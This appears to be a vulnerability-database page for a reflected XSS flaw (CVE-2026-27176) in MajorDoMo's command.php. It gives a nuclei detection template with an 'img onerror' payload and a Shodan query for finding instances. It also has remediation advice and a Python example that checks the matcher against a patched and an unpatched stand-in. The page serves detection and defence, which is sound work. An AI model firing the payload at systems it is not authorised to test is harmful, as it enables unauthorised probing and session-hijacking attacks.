MajorDoMo - Cross-Site Scripting
CVE-2026-27176
Verified
Description
MajorDoMo contains a reflected cross-site scripting (XSS) vulnerability: the $qry parameter of command.php is echoed into the HTML response without sanitization, so an attacker can inject arbitrary JavaScript through a crafted URL. Exploitation requires the victim to open the malicious URL.
Severity
Medium
CVSS Score
6.1
Exploit Probability
Below 1% (EPSS score 0.00095, rounded to 0% in the summary)
Published Date
May 4, 2026
Template Author
dhiyaneshdk
CVE-2026-27176.yaml
id: CVE-2026-27176

info:
  name: MajorDoMo - Cross-Site Scripting
  author: DhiyaneshDk
  severity: medium
  description: |
    MajorDoMo contains a reflected cross-site scripting (XSS) vulnerability: the $qry parameter of command.php is echoed into the HTML response without sanitization, so an attacker can inject arbitrary JavaScript through a crafted URL. Exploitation requires the victim to open the malicious URL.
  impact: |
    An attacker can execute arbitrary JavaScript in the victim's browser, leading to session hijacking or other client-side attacks.
  remediation: |
    Encode the $qry parameter for HTML output, for example with htmlspecialchars($qry, ENT_QUOTES, 'UTF-8') or an equivalent context-aware encoder, before rendering it into the page.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-27176
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2026-27176
    epss-score: 0.00095
    epss-percentile: 0.26165
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"majordomo"
  tags: cve,cve2026,xss,majordomo

http:
  - method: GET
    path:
      - "{{BaseURL}}/command.php?qry=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><img src=x onerror=alert(document.domain)>'
          - "Command:"
        condition: and

      - type: word
        part: content_type
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100dee7f292e132a735583f856a1c08aab16d4985753ec455facad6c46d113407590220375ff28395fd430a8021f6e0dcae849f0ab5ff2b2fbb15e718ac1c514a8b392f:922c64590222798bb761d5b6d8e72950
Score
6.1
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID:
CVE-2026-27176
CWE ID:
CWE-79
Remediation Steps
Encode the $qry parameter for HTML output, for example with htmlspecialchars($qry, ENT_QUOTES, 'UTF-8') or an equivalent context-aware encoder, before rendering it into the page. Pass ENT_QUOTES explicitly: before PHP 8.1 htmlspecialchars() defaults to ENT_COMPAT, which leaves single quotes unencoded, so a value rendered inside a single-quoted attribute would still break out. The payload used by the template opens with a double quote precisely to close an attribute and start a new tag, and encoding both quote characters together with <, > and & is what makes that inert.
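To show what the template above actually checks, and why the remediation defeats it, here is an added Python example. It is not part of the nuclei template, not the nuclei engine, and not MajorDoMo code: the two render functions are constructed stand-ins for command.php (the real source is not reproduced on this page, and the "Command:" page layout is assumed from the template's body matcher), the target hostname is made up, and html.escape(quote=True) is used as a Python equivalent of PHP's htmlspecialchars() with ENT_QUOTES. The matcher function mirrors the template's three matchers and their and-conditions one for one.

```python
"""Added example: the matcher logic of the CVE-2026-27176 nuclei template, run
offline against constructed responses. Hand-written mirror of the template's
conditions; not MajorDoMo code and not the nuclei engine."""
import html
from urllib.parse import quote

# Payload exactly as the template sends it in the qry parameter.
PAYLOAD = '"><img src=x onerror=alert(document.domain)>'


def build_probe_url(base_url: str) -> str:
    """Build the template's single GET request: {{BaseURL}}/command.php?qry=<payload>.
    Parentheses are left unencoded so the path matches the template byte for byte."""
    return f"{base_url.rstrip('/')}/command.php?qry={quote(PAYLOAD, safe='()')}"


def render_vulnerable(qry: str) -> str:
    """Constructed stand-in for an unpatched command.php: $qry is echoed raw
    after the "Command:" label (assumed layout, not the real source)."""
    return f"<html><body><p>Command: {qry}</p></body></html>"


def render_patched(qry: str) -> str:
    """Same stand-in after the fix. html.escape(quote=True) plays the role of
    htmlspecialchars($qry, ENT_QUOTES, 'UTF-8'): <, >, & and both quote
    characters are encoded, so the injected tag stays inert text."""
    return f"<html><body><p>Command: {html.escape(qry, quote=True)}</p></body></html>"


def fake_response(render, status: int = 200,
                  content_type: str = "text/html; charset=utf-8") -> dict:
    """Constructed HTTP response to the probe, built from one of the render functions."""
    return {"status": status,
            "headers": {"Content-Type": content_type},
            "body": render(PAYLOAD)}


def template_matches(resp: dict) -> bool:
    """Mirror the three matchers joined by matchers-condition: and.

    1. word matcher on the body with condition: and, so BOTH the raw payload
       and the "Command:" marker must appear (the marker keeps generic
       reflection from unrelated apps out of the results);
    2. word matcher on the Content-Type header for "text/html";
    3. status matcher for 200.
    Nuclei word matching is a case-sensitive substring test, as here.
    """
    body = resp["body"]
    body_ok = PAYLOAD in body and "Command:" in body
    ctype_ok = "text/html" in resp["headers"].get("Content-Type", "")
    status_ok = resp["status"] == 200
    return body_ok and ctype_ok and status_ok


if __name__ == "__main__":
    print(build_probe_url("http://target.example"))
    print("unpatched response matches:", template_matches(fake_response(render_vulnerable)))
    print("patched response matches:  ", template_matches(fake_response(render_patched)))
```

What the match proves, and what it does not: a hit means the unencoded payload came back in a 200 text/html response next to the "Command:" marker, i.e. the parameter is reflected without output encoding. It does not prove a browser would execute it; a Content-Security-Policy or an injection context other than the one the payload assumes can leave a match unexploitable, so confirm in a browser before reporting. Conversely, once the output is encoded as in render_patched, the body contains `&quot;&gt;&lt;img ...` rather than the payload and the template correctly stops matching.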